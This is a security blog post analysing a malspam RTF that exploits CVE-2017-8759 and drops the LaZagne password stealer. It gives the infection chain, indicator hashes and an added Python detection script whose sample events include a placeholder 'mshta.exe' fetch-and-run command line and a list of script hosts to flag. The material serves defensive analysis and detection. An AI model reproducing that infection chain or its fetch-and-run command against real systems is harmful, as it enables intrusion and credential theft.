Malspam and CVE-2017-8759

Blog Post created by Ahmed Sonbol Employee on Sep 18, 2017

On September 12th, FireEye security researchers disclosed information about CVE-2017-8759, a code injection vulnerability in the .NET Framework's SOAP WSDL parser [1]. Microsoft has already released a patch that addresses the vulnerability in the affected products [2]. It did not take long to see a significant increase in the number of malicious files trying to exploit it: a day or two after the disclosure a handful of samples had been submitted to VirusTotal; a week later more than a hundred had. This suggests that exploitation is shifting from targeted attacks to mass distribution.

In this blog post we discuss the host and network behavior of one of those samples and see how its activity looks in RSA NetWitness Packets and RSA NetWitness Endpoint.

The delivery document under investigation is spreading as Quote.doc; despite the extension it is an RTF file. Upon opening it in Microsoft Word, the following HTTP request was noticed, fetching a SOAP WSDL definition from the attacker's server:

For this session, NetWitness Packets registered the following meta under Service Analysis, flagging the traffic as suspicious:

The vulnerable WSDL parser processes the SOAP response. Because the parser does not sanitize the WSDL content before turning it into source code, attacker-supplied text ends up in a C# file that .NET then compiles and loads inside the Word process. The following events took place on the infected host:

  • A .cs source code file (Logo.cs in this case) was generated in C:\Windows\System32\com\SOAPAssembly.
  • csc.exe compiled the generated source code into a DLL file (http100googlegtv4com0pppp0office4png.dll in this case).
  • Microsoft Word loaded the generated DLL file.
  • An HTTP request was sent to the same server to retrieve a script.
  • mshta.exe was called to run the downloaded script.
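
To show how this chain can be picked out of endpoint telemetry, here is an added example (not code from the original post or from NetWitness): a small Python detection run over constructed process, file-creation and image-load events for one infected host. The event schema, the process ids, the command lines and the developer-build noise events are assumptions; the SOAPAssembly path, Logo.cs and the DLL name come from the case above. The logic also generalizes beyond this sample: it keys off the chain itself (a .cs generated under SOAPAssembly, csc.exe spawned by an Office process, the resulting DLL loaded back into Office, and a script host launched from Office) rather than off the sample's hashes, so a variant with a different DLL name or second-stage script host would still be reported.

```python
"""Detection of the CVE-2017-8759 exploitation chain in endpoint telemetry.

Added example, not code from the original post or from NetWitness: the event
schema, pids, command lines and the benign noise events are constructed to
illustrate the chain described above (generated .cs under SOAPAssembly,
csc.exe spawned from Word, the compiled DLL loaded back into Word, and
mshta.exe launched to run the second stage).
"""
from collections import defaultdict

SOAP_DIR = r"c:\windows\system32\com\soapassembly"
# Assumption: Office hosts that can embed the SOAP moniker; extend as needed.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script/command hosts an exploited Office process has no business spawning.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed sample events (not real telemetry). Every event carries the pid
# it belongs to; process events also carry ppid, image and cmdline.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1,
     "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE "C:\Users\victim\Downloads\Quote.doc"'},
    # .NET writes the generated C# source from inside the Word process.
    {"type": "file_create", "pid": 100,
     "path": r"C:\Windows\System32\com\SOAPAssembly\Logo.cs"},
    {"type": "process", "pid": 101, "ppid": 100,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": "csc.exe /target:library Logo.cs"},
    {"type": "file_create", "pid": 101,
     "path": r"C:\Windows\System32\com\SOAPAssembly\http100googlegtv4com0pppp0office4png.dll"},
    {"type": "image_load", "pid": 100,
     "path": r"C:\Windows\System32\com\SOAPAssembly\http100googlegtv4com0pppp0office4png.dll"},
    {"type": "process", "pid": 102, "ppid": 100,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/stage2"},  # placeholder URL
    # Benign noise: a developer build, where csc.exe has a non-Office parent.
    {"type": "process", "pid": 200, "ppid": 1,
     "image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"type": "process", "pid": 201, "ppid": 200,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": "csc.exe /target:library App.cs"},
    {"type": "file_create", "pid": 201, "path": r"C:\Users\dev\src\App.dll"},
]


def basename(path):
    """Lower-cased file name of a Windows path (accepts / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_soap_dir(path):
    """True when the path lies directly under the SOAPAssembly directory."""
    return path.replace("/", "\\").lower().startswith(SOAP_DIR + "\\")


def detect_soap_wsdl_chain(events):
    """Group the chain's stages by the Office process they belong to.

    Returns {office_pid: {"stages": [...], "confidence": "low|medium|high"}}.
    A stage counts only when the event's process is the Office process itself
    or a direct child of it; that pid/ppid linkage is what rules out the
    developer build in the sample data.
    """
    procs = {e["pid"]: e for e in events if e["type"] == "process"}

    def office_root(pid):
        proc = procs.get(pid)
        if proc is None:
            return None
        if basename(proc["image"]) in OFFICE_APPS:
            return pid
        parent = procs.get(proc["ppid"])
        if parent is not None and basename(parent["image"]) in OFFICE_APPS:
            return proc["ppid"]
        return None

    stages = defaultdict(set)
    for e in events:
        root = office_root(e["pid"])
        if root is None:
            continue
        is_child = e["pid"] != root
        path = e.get("path", "").lower()
        if e["type"] == "file_create" and in_soap_dir(path) and path.endswith(".cs"):
            stages[root].add("soap_source_generated")
        elif e["type"] == "process" and is_child and basename(e["image"]) == "csc.exe":
            stages[root].add("csc_spawned_by_office")
        elif e["type"] == "image_load" and not is_child and in_soap_dir(path) and path.endswith(".dll"):
            stages[root].add("soap_dll_loaded_by_office")
        elif e["type"] == "process" and is_child and basename(e["image"]) in SCRIPT_HOSTS:
            stages[root].add("script_host_spawned_by_office")

    results = {}
    for pid, seen in stages.items():
        confidence = "high" if len(seen) >= 3 else "medium" if len(seen) == 2 else "low"
        results[pid] = {"stages": sorted(seen), "confidence": confidence}
    return results


if __name__ == "__main__":
    for pid, r in detect_soap_wsdl_chain(EVENTS).items():
        print(f"pid {pid}: {r['confidence']} confidence, stages={r['stages']}")
```

Run directly it reports pid 100 at high confidence with all four stages and stays silent on the developer build. In a real pipeline, EVENTS would be replaced by the EDR's process, file and module events; keeping the pid/ppid linkage is what separates an exploited Office process from legitimate csc.exe or mshta.exe use elsewhere on the host.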

The next screenshot shows the machine scan data on NetWitness Endpoint:

Here is the NetWitness Packets event reconstruction of the second payload delivery (the script retrieved after the generated DLL was loaded):

The screenshot below shows the files created in C:\Windows\System32\com\SOAPAssembly:

Here is a closer look at the content of the newly created source code file Logo.cs:

When the second payload ran, it issued an HTTP request straight to an IP address (no hostname involved) in order to download an obfuscated PowerShell script:

When powershell.exe ran the script, it dropped an executable on the victim machine:

The dropped executable is a LaZagne variant. LaZagne is a publicly available open-source tool for retrieving passwords stored on a local computer (browsers, mail clients, Wi-Fi profiles and the like). The original post linked the VirusTotal analysis results and the hybrid-analysis.com report for this sample; its SHA256 hash is listed at the end of this post. On NetWitness Endpoint the following module IIOCs (Instant IOCs) were generated:

  • In root of AppDataRoaming directory
  • Unsigned writes executable
  • Unsigned writes executable to users directory
  • Unsigned writes executable to AppDataLocal directory
  • Self delete
  • In AppData directory

Following the execution of LaZagne.exe, a newly created process, AZAaPaAA.exe, can be observed; according to the VirusTotal analysis results it is also a LaZagne variant (the original post linked the VirusTotal and hybrid-analysis.com reports; its SHA256 hash is listed at the end). NetWitness Endpoint generated even more IIOCs for this module:

  • In root of Program directory
  • In root of AppDataRoaming directory
  • In hidden directory
  • Unsigned opens OS process
  • Unsigned writes executable
  • Unsigned writes executable to Windows directory
  • Unsigned writes executable to users directory
  • Unsigned writes executable to AppDataLocal directory
  • Self delete
  • Unsigned copy itself
  • Runs powershell with long arguments
  • In AppData directory
  • In ProgramData directory
  • Unsigned opens process
  • Runs command shell
  • Runs powershell

A quick look at the embedded strings of those binaries confirms what kind of data they are targeting:

Finally, below is a recap of the HTTP traffic for this infection as seen in NetWitness Packets:

Delivery document (SHA256):

  • 640b9b789efe66bca20812af4f4e017bb7524ee8a6a4ec5e153a73af9bd0a007

LaZagne binaries (SHA256):

  • 3f6e8dea07b6e87182b3068868746e5054123a7c86e04d775292af7ffd1ce9b4
  • 9485a1630d9283d7efee3828fca32d72cfcb3fb1e91015a9753df09a21f14da2

References:

  1. FireEye Threat Research Blog, "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", September 12, 2017.
  2. Microsoft Security Response Center, security advisory for CVE-2017-8759: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759